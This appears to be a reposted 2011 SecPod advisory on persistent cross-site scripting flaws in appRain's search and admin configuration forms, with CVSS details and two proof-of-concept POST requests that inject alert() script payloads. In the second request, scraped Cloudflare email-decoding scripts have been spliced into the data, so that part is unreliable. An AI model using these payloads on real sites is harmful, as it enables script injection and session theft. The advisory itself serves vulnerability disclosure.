appRain Quick Start Edition Core Edition Multiple Persistence Cros...[网络技术]

 .
Author   : Antu Sanadi from SecPod Technologies 
Vendor   : http://www.apprain.com/
Advisory : http://secpod.org/blog/?p=215
           http://secpod.org/advisories/SECPOD_AppRain_Multiple_XSS.txt
Version  : appRain 0.1.4-Alpha and appRain-d-0.1.3
Date     : 08/07/2011
 
###############################################################################
 
SecPod ID:  1015                01/05/2011 Issue Discovered
                                                04/05/2011 Vendor Notified
                                                No Response from the Vendor
                                        08/07/2011 Advisory Released
 
 
Class: Cross-Site Scripting (Persistence)   Severity: Medium
 
 
Overview:
---------
appRain 0.1.4-Alpha(Quick Start Edition) and appRain-d-0.1.3 (Core Edition)
multiple Persistence Cross-Site Scripting vulnerabilities.
 
 
Technical Description:
----------------------
i) appRain 0.1.4-Alpha(Quick Start Edition) and appRain-d-0.1.3 (Core Edition) are
   prone to multiple persistence cross-site scripting vulnerabilities as it fails
   to properly sanitise user-supplied input.
 
   Input passed via the 'ss' parameter in 'search' action is not properly verified
   before it is returned to the user. This can be exploited to execute arbitrary
   HTML and script code in a user's browser session in the context of a vulnerable
   site. This may allow an attacker to steal cookie-based authentication
   credentials and launch further attacks.
 
 
ii) Input passed via the 'data[sconfig][site_title]' parameter in '/admin/config/general'
    action is not properly verified before it is returned to the user. This can be
    exploited to execute arbitrary HTML and script code in a user's browser session
    in the context of a vulnerable site. This may allow an authinticated attacker to
    launch further attacks.
 
    NOTE: Authentication is required to exploit this vulnerability.
 
    The vulnerability has been tested in appRain 0.1.4-Alpha (Quick Start Edition),
    appRain-q-0.1.3 (Quick Start Edition), appRain-q-0.1.1 (Quick Start Edition),
    appRain-d-0.1.3 (Core Edition) and appRain-d-0.1.2 (Core Edition) ,Other versions
    may also be affected.
 
 
Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML
code in a user's browser session in the context of a vulnerable application.
 
 
Affected Software:
------------------
i) appRain 0.1.4-Alpha (Quick Start Edition) and prior.
 
ii)appRain-d-0.1.3 (Core Edition) and prior.
   appRain 0.1.4-Alpha (Quick Start Edition) and prior.
 
Tested on,
ppRain 0.1.4-Alpha (Quick Start Edition),
appRain-q-0.1.3 (Quick Start Edition),
appRain-q-0.1.1 (Quick Start Edition),
appRain-d-0.1.3 (Core Edition) and
appRain-d-0.1.2 (Core Edition)
 
 
References:
-----------
http://www.apprain.com/
http://secpod.org/blog/?p=215
http://secpod.org/advisories/SECPOD_AppRain_Multiple_XSS.txt
 
 
Proof of Concept:
-----------------
 
POC 1:
-----
POST appRainq/search HTTP/1.1
 
Host: 192.168.1.17
User-Agent: appRain XSS test
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
 
Post Data:
----------
ss=</title><script>alert('SECPOD-XSS-TEST')</script>
 
 
POC 2:
-----
NOTE: Authentication is required to exploit this vulnerability.
 
POST appRainq/admin/config/general HTTP/1.1
 
Host: 192.168.1.17(www.110hack.com)
User-Agent:  appRain XSS test
Content-Type: application/x-www-form-urlencoded
Content-Length:359
 
Post Data:
----------
data[sconfig][site_title]=<script>alert('SECPOD-XSS-TEST')</script>&data[sconfig][admin_title]=Lipsum&data[sconfig][site_logo_1]=logo.gif&data[sconfig][site_logo_2]=apprain-logo-yellow.gif&data[sconfig][copy_right_text]=xyz&data[sconfig][admin_email]=a@b.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>&data[sconfig][support_email]=b@c.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>&data[sconfig][corporate_email]=d@e.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>&Button[button_save]=Save
 
 
Solution:
----------
Fix not available
 
 
Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = REQUIRE
        CONFIDENTIALITY_IMPACT = PARTIAL
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5.5 (MEDIUM) (AV:N/AC:M/Au:S/C:P/I:P/A:N)
 
 
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.